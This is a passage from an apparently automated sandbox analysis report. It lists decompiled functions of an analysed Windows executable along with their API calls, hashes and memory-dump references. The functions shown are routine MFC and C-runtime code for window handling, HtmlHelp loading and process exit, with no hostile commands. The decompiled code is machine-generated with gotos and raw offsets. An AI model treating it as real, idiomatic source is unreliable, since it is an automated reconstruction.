                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00410715
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0041072A
                                                                                • Part of subcall function 00410097: __EH_prolog.LIBCMT ref: 0041009C
                                                                                • Part of subcall function 00410097: VariantClear.OLEAUT32(?), ref: 004100FE
                                                                                • Part of subcall function 00411612: VariantCopy.OLEAUT32(?,?), ref: 0041161A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                              • String ID:
                                                                              • API String ID: 3098219910-0
                                                                              • Opcode ID: eab87efa52ee99567b57d9f639eea13987402111c4ae0d0fd517355a8fb88391
                                                                              • Instruction ID: 85d627a782305c6a27c3470648538f77c5723829fa7d2679dc32c5e27cd45aa6
                                                                              • Opcode Fuzzy Hash: eab87efa52ee99567b57d9f639eea13987402111c4ae0d0fd517355a8fb88391
                                                                              • Instruction Fuzzy Hash: B8513BB1900209DFDB24DFA4C984BEEBBB8FF48304F10452AE116E7291D7B5A985CF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B4D1, Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042B4D1(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E0042B498();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E00408116();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                              0x0042b4d9
                                                                              0x0042b4e1
                                                                              0x0042b4e3
                                                                              0x0042b500
                                                                              0x0042b50e
                                                                              0x0042b519
                                                                              0x0042b51b
                                                                              0x0042b51d
                                                                              0x0042b51f
                                                                              0x0042b52a
                                                                              0x0042b52c
                                                                              0x0042b539
                                                                              0x0042b539
                                                                              0x0042b53b
                                                                              0x0042b541
                                                                              0x0042b545
                                                                              0x0042b563
                                                                              0x0042b556
                                                                              0x0042b559
                                                                              0x0042b55b
                                                                              0x0042b55b
                                                                              0x0042b545
                                                                              0x0042b56c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b521
                                                                              0x0042b521
                                                                              0x0042b522
                                                                              0x0042b524
                                                                              0x0042b526
                                                                              0x00000000
                                                                              0x0042b521
                                                                              0x0042b513
                                                                              0x0042b515
                                                                              0x0042b517
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b517
                                                                              0x0042b4e5
                                                                              0x0042b4ec
                                                                              0x0042b4fb
                                                                              0x0042b4fb
                                                                              0x00000000
                                                                              0x0042b4fb
                                                                              0x0042b4ee
                                                                              0x0042b4f5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b4f7
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                              • String ID:
                                                                              • API String ID: 670545878-0
                                                                              • Opcode ID: 95e328cc6c4add9bda531c8189a7f2f5860e3f2c31ffa614b97492a06306aa9b
                                                                              • Instruction ID: 43f622d831046ced162240069887d2157db7c7602340c0cd1b66217376ed21cf
                                                                              • Opcode Fuzzy Hash: 95e328cc6c4add9bda531c8189a7f2f5860e3f2c31ffa614b97492a06306aa9b
                                                                              • Instruction Fuzzy Hash: 4A11C132301631678621AA6ABD8072BB398DF65B68F95012BEC00DB311EBA8DD8142DD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042ACB3, Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E0042ACB3(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                                                                              0x0042acc2
                                                                              0x0042acce
                                                                              0x0042acd0
                                                                              0x0042ad13
                                                                              0x0042ad13
                                                                              0x0042ad15
                                                                              0x0042ad19
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042acdf
                                                                              0x0042acf6
                                                                              0x0042acfc
                                                                              0x0042ad0e
                                                                              0x00000000
                                                                              0x0042ad21
                                                                              0x0042ad0e
                                                                              0x0042ad10
                                                                              0x0042ad12
                                                                              0x0042ad12
                                                                              0x0042ad1e

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                              • String ID:
                                                                              • API String ID: 1315500227-0
                                                                              • Opcode ID: dbdc1b5fa6172663c6096589d8edfa90ac923ddac20c32444a2081ee88a8308c
                                                                              • Instruction ID: 6bd5241dd8d81b189ddff31684821fd5ff96e47c232e402118d2efec229488b6
                                                                              • Opcode Fuzzy Hash: dbdc1b5fa6172663c6096589d8edfa90ac923ddac20c32444a2081ee88a8308c
                                                                              • Instruction Fuzzy Hash: D001A232200129ABDB11AF54AD08FEF376DEF04351F944026FE01E2150D778DA218BA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415B10, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E00415B10(void* __ebx, void* __edi, void* __esi, char* _a4, char* _a8, short* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v152;
				intOrPtr _t19;
				void* _t20;
				char* _t23;
				void* _t26;
				void* _t36;
				void* _t37;
				void* _t40;
				short* _t52;
				intOrPtr* _t53;
				void* _t55;
				char* _t59;
				void* _t61;
				void* _t62;

				_t55 = __edi;
				_t37 = __ebx;
				_t19 =  *0x457184; // 0xb7aa1229
				_t59 = _a4;
				_v8 = _t19;
				if(_t59 != 0) {
					if( *_t59 != 0x43 ||  *((char*)(_t59 + 1)) != 0) {
						_push(_t37);
						_t20 = E00411A30(_t59);
						_t40 = _t55;
						if(_t20 >= 0x82) {
							L11:
							if(E004158EC(_t40,  &_v152, _t59) != 0) {
								L13:
								_t23 = 0;
								L23:
								goto L24;
							}
							_t26 = E0041C4D8(0,  &_v152, 0x45a5a4,  &_v152);
							_t62 = _t61 + 0xc;
							if(_t26 != 0) {
								 *0x45a5ac =  *0x45a5a8 & 0x0000ffff;
								E004159C8(_t59, 0x457640,  &_v152);
								if( *_t59 == 0 || E00411A30(_t59) >= 0x82) {
									_t59 = 0x4326f8;
								}
								 *0x45763a = 0;
								E0041ADB0(0x4575b8, _t59, 0x82);
								_t61 = _t62 + 0xc;
								L18:
								if(_a12 != 0) {
									E00411AC0(_a12, 0x45a5a4, 6);
									_t61 = _t61 + 0xc;
								}
								if(_a16 != 0) {
									E00411AC0(_a16, 0x45a5ac, 4);
								}
								E00419460(_a8, 0x457640);
								_t23 = 0x457640;
								goto L23;
							}
							goto L13;
						}
						if(E00416EE0(0x457640, _t59) == 0) {
							goto L18;
						}
						_t36 = E00416EE0(0x4575b8, _t59);
						_pop(_t40);
						if(_t36 == 0) {
							goto L18;
						}
						goto L11;
					} else {
						_t23 = _a8;
						_t52 = _a12;
						 *_t23 = 0x43;
						 *((char*)(_t23 + 1)) = 0;
						if(_t52 != 0) {
							 *_t52 = 0;
							 *((short*)(_t52 + 2)) = 0;
							 *((short*)(_t52 + 4)) = 0;
						}
						_t53 = _a16;
						if(_t53 != 0) {
							 *_t53 = 0;
						}
						L24:
						return E00412FBB(_t23, _v8);
					}
				}
				_t23 = 0;
				goto L24;
			}


















                                                                              0x00415b10
                                                                              0x00415b10
                                                                              0x00415b19
                                                                              0x00415b1f
                                                                              0x00415b26
                                                                              0x00415b29
                                                                              0x00415b35
                                                                              0x00415b6b
                                                                              0x00415b6e
                                                                              0x00415b7a
                                                                              0x00415b80
                                                                              0x00415ba4
                                                                              0x00415bb5
                                                                              0x00415bd0
                                                                              0x00415bd0
                                                                              0x00415c5f
                                                                              0x00000000
                                                                              0x00415c60
                                                                              0x00415bc4
                                                                              0x00415bc9
                                                                              0x00415bce
                                                                              0x00415bde
                                                                              0x00415bef
                                                                              0x00415bf9
                                                                              0x00415c06
                                                                              0x00415c06
                                                                              0x00415c0e
                                                                              0x00415c15
                                                                              0x00415c1a
                                                                              0x00415c1d
                                                                              0x00415c21
                                                                              0x00415c2d
                                                                              0x00415c32
                                                                              0x00415c32
                                                                              0x00415c39
                                                                              0x00415c45
                                                                              0x00415c4a
                                                                              0x00415c56
                                                                              0x00415c5d
                                                                              0x00000000
                                                                              0x00415c5d
                                                                              0x00000000
                                                                              0x00415bce
                                                                              0x00415b91
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415b99
                                                                              0x00415ba1
                                                                              0x00415ba2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415b3d
                                                                              0x00415b3d
                                                                              0x00415b40
                                                                              0x00415b45
                                                                              0x00415b48
                                                                              0x00415b4c
                                                                              0x00415b4e
                                                                              0x00415b51
                                                                              0x00415b55
                                                                              0x00415b55
                                                                              0x00415b59
                                                                              0x00415b5e
                                                                              0x00415b64
                                                                              0x00415b64
                                                                              0x00415c61
                                                                              0x00415c6b
                                                                              0x00415c6b
                                                                              0x00415b35
                                                                              0x00415b2b
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @vE
                                                                              • API String ID: 0-4027072445
                                                                              • Opcode ID: d3dee81b3df11f8ae4f38b2767deaf8127efefd7da99a67e80e8a253e3816d11
                                                                              • Instruction ID: e540ec56f7d4265e4339a02ba9b599a70780e187e7edd262bb5e60d86974fcfc
                                                                              • Opcode Fuzzy Hash: d3dee81b3df11f8ae4f38b2767deaf8127efefd7da99a67e80e8a253e3816d11
                                                                              • Instruction Fuzzy Hash: 42313C71609704EADB249F21ED41FDB3B95DF80319F24406BF90992282F63C89C0C69E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042654B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042654B(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E004239C5();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0042D19F() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E00412140( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E00426363(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E00426480(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                              0x00426554
                                                                              0x0042655b
                                                                              0x00426561
                                                                              0x00426566
                                                                              0x0042658b
                                                                              0x0042658b
                                                                              0x00426591
                                                                              0x00426593
                                                                              0x00426593
                                                                              0x00426591
                                                                              0x00426596
                                                                              0x0042659b
                                                                              0x0042659f
                                                                              0x004265a2
                                                                              0x004265a2
                                                                              0x004265a5
                                                                              0x004265ad
                                                                              0x004265b2
                                                                              0x004265b2
                                                                              0x004265b5
                                                                              0x004265bc
                                                                              0x004265c3
                                                                              0x004265c8
                                                                              0x004265d8
                                                                              0x004265dd
                                                                              0x004265e3
                                                                              0x004265e6
                                                                              0x004265f7
                                                                              0x004265fe
                                                                              0x00426601
                                                                              0x00426601
                                                                              0x004265c8
                                                                              0x00426613
                                                                              0x00426619
                                                                              0x00426628
                                                                              0x00426634
                                                                              0x00426638
                                                                              0x00426640
                                                                              0x00426640
                                                                              0x00426638
                                                                              0x00426648
                                                                              0x0042665b

                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00426601
                                                                              • GetWindowLongA.USER32 ref: 00426613
                                                                              • GetWindowLongA.USER32 ref: 00426624
                                                                              • SetWindowLongA.USER32 ref: 00426640
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID: (
                                                                              • API String ID: 2178440468-3887548279
                                                                              • Opcode ID: 9c4bcfc4ee51cfbf3176cafee28f459e07d27a4d4cb54d451c298dc73f6ee003
                                                                              • Instruction ID: a63dd4c9a30836d874787e4657041ba80e4b8e3c142ff3cba496c3d6a54188c0
                                                                              • Opcode Fuzzy Hash: 9c4bcfc4ee51cfbf3176cafee28f459e07d27a4d4cb54d451c298dc73f6ee003
                                                                              • Instruction Fuzzy Hash: EC31B670700720AFDB20AFA5E984A6EB7F4BF04314F550A2EE541D7791DB79E8448B98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004245ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004245ED(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t12;
				struct HWND__* _t14;
				struct HWND__* _t17;
				struct HWND__** _t24;
				void* _t25;

				_t24 = _a4;
				_t25 = __ecx;
				if(E00424FF1(__ecx, _t24) != 0) {
					L12:
					return 1;
				}
				_t12 = E00426C61(__ecx);
				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x64)) == 0) {
					if(_t24[1] != 0x100) {
						L13:
						return E00425910(_t24);
					}
					_t14 = _t24[2];
					if(_t14 == 0x1b || _t14 == 3) {
						if((GetWindowLongA( *_t24, 0xfffffff0) & 0x00000004) == 0 || E0042AB7A( *_t24, ?str?) == 0) {
							goto L13;
						} else {
							_t17 = GetDlgItem( *(_t25 + 0x1c), 2);
							if(_t17 == 0 || IsWindowEnabled(_t17) != 0) {
								SendMessageA( *(_t25 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}








                                                                              0x004245ef
                                                                              0x004245f4
                                                                              0x004245fd
                                                                              0x00424674
                                                                              0x00000000
                                                                              0x00424676
                                                                              0x00424601
                                                                              0x00424608
                                                                              0x0042461b
                                                                              0x00424679
                                                                              0x00000000
                                                                              0x0042467c
                                                                              0x0042461d
                                                                              0x00424623
                                                                              0x00424636
                                                                              0x00000000
                                                                              0x00424648
                                                                              0x0042464d
                                                                              0x00424655
                                                                              0x0042466e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424655
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424610
                                                                              0x00000000
                                                                              0x00424610

                                                                              APIs
                                                                              • GetWindowLongA.USER32 ref: 0042462E
                                                                              • GetDlgItem.USER32 ref: 0042464D
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00424658
                                                                              • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0042466E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledItemLongMessageSend
                                                                              • String ID: Edit
                                                                              • API String ID: 3499652902-554135844
                                                                              • Opcode ID: 5e20d823228ff4028015ccd002ff231b5a2e6e116b7465e0d62b9a8d207303ff
                                                                              • Instruction ID: a2700694f9d9f0967da1c6dfa14d6a282cfffe46059050308ef3b8d2e634c46b
                                                                              • Opcode Fuzzy Hash: 5e20d823228ff4028015ccd002ff231b5a2e6e116b7465e0d62b9a8d207303ff
                                                                              • Instruction Fuzzy Hash: 0C01C430300221BBFB212A36BD09B5BB6A8EFD6754F90442BB401E26A0CBACDC55C56C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00426F0A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E00426F0A(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;
				void* _t21;

				E0042E21A(0xc);
				_push(E0042D814);
				_t21 = E0042DCF8(0x459f84);
				if( *(_t21 + 8) != 0) {
					L5:
					E0042E27D(0xc);
					return  *(_t21 + 8)(_v4, _v0, _a4, _a8);
				}
				_t16 = LoadLibraryA("hhctrl.ocx");
				 *(_t21 + 4) = _t16;
				if(_t16 == 0) {
					L4:
					return 0;
				}
				_t18 = GetProcAddress(_t16, "HtmlHelpA");
				 *(_t21 + 8) = _t18;
				if(_t18 != 0) {
					goto L5;
				}
				FreeLibrary( *(_t21 + 4));
				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
				goto L4;
			}








                                                                              0x00426f0d
                                                                              0x00426f12
                                                                              0x00426f21
                                                                              0x00426f27
                                                                              0x00426f5f
                                                                              0x00426f61
                                                                              0x00000000
                                                                              0x00426f76
                                                                              0x00426f2e
                                                                              0x00426f36
                                                                              0x00426f39
                                                                              0x00426f5b
                                                                              0x00000000
                                                                              0x00426f5b
                                                                              0x00426f41
                                                                              0x00426f49
                                                                              0x00426f4c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426f51
                                                                              0x00426f57
                                                                              0x00000000

                                                                              APIs
                                                                                • Part of subcall function 0042E21A: EnterCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E248
                                                                                • Part of subcall function 0042E21A: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E25A
                                                                                • Part of subcall function 0042E21A: LeaveCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E263
                                                                                • Part of subcall function 0042E21A: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA), ref: 0042E275
                                                                                • Part of subcall function 0042DCF8: __EH_prolog.LIBCMT ref: 0042DCFD
                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,0042D814,0000000C), ref: 00426F2E
                                                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00426F41
                                                                              • FreeLibrary.KERNEL32(?), ref: 00426F51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                              • String ID: HtmlHelpA$hhctrl.ocx
                                                                              • API String ID: 813623328-63838506
                                                                              • Opcode ID: 7751eb0f48a971483a9b2d3d49afb441e249794db7093acebf144680adc25de2
                                                                              • Instruction ID: ec84fb330353fb2223ea04a242bd68e69340dc90ea18e4341332e045746a19a5
                                                                              • Opcode Fuzzy Hash: 7751eb0f48a971483a9b2d3d49afb441e249794db7093acebf144680adc25de2
                                                                              • Instruction Fuzzy Hash: 2EF0A430304311EFDB106F71FE09B077BE1AF44B41F51885EB14A911A1C7B88854DB2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412FFD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E00412FFD(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                              0x00413002
                                                                              0x0041300a
                                                                              0x00413012
                                                                              0x0041301a
                                                                              0x00413020
                                                                              0x00413020
                                                                              0x0041301a
                                                                              0x00413026

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll,0041316B,?,0044BCA0,00000008,004131A2,?,00000001,00000000,004186CD,00000003), ref: 00413002
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413012
                                                                              • ExitProcess.KERNEL32 ref: 00413026
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 75539706-1276376045
                                                                              • Opcode ID: e0e97cc8cc4b6864abc04eab186df5826a1657425e816fd553d1da5beef36913
                                                                              • Instruction ID: bf4fb5760515a6d20d965b8590582e7a2281e39d95d480b19d3eb211be91e2db
                                                                              • Opcode Fuzzy Hash: e0e97cc8cc4b6864abc04eab186df5826a1657425e816fd553d1da5beef36913
                                                                              • Instruction Fuzzy Hash: 98D0C930204201ABFA201FB19F89A1B3BBCEE48B027149429B545D01B0CFB8CD40EA2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042F640, Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E0042F640(intOrPtr __ecx, intOrPtr __edx) {
				signed int __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t94;
				int _t95;
				void* _t100;
				signed short* _t101;
				void* _t108;
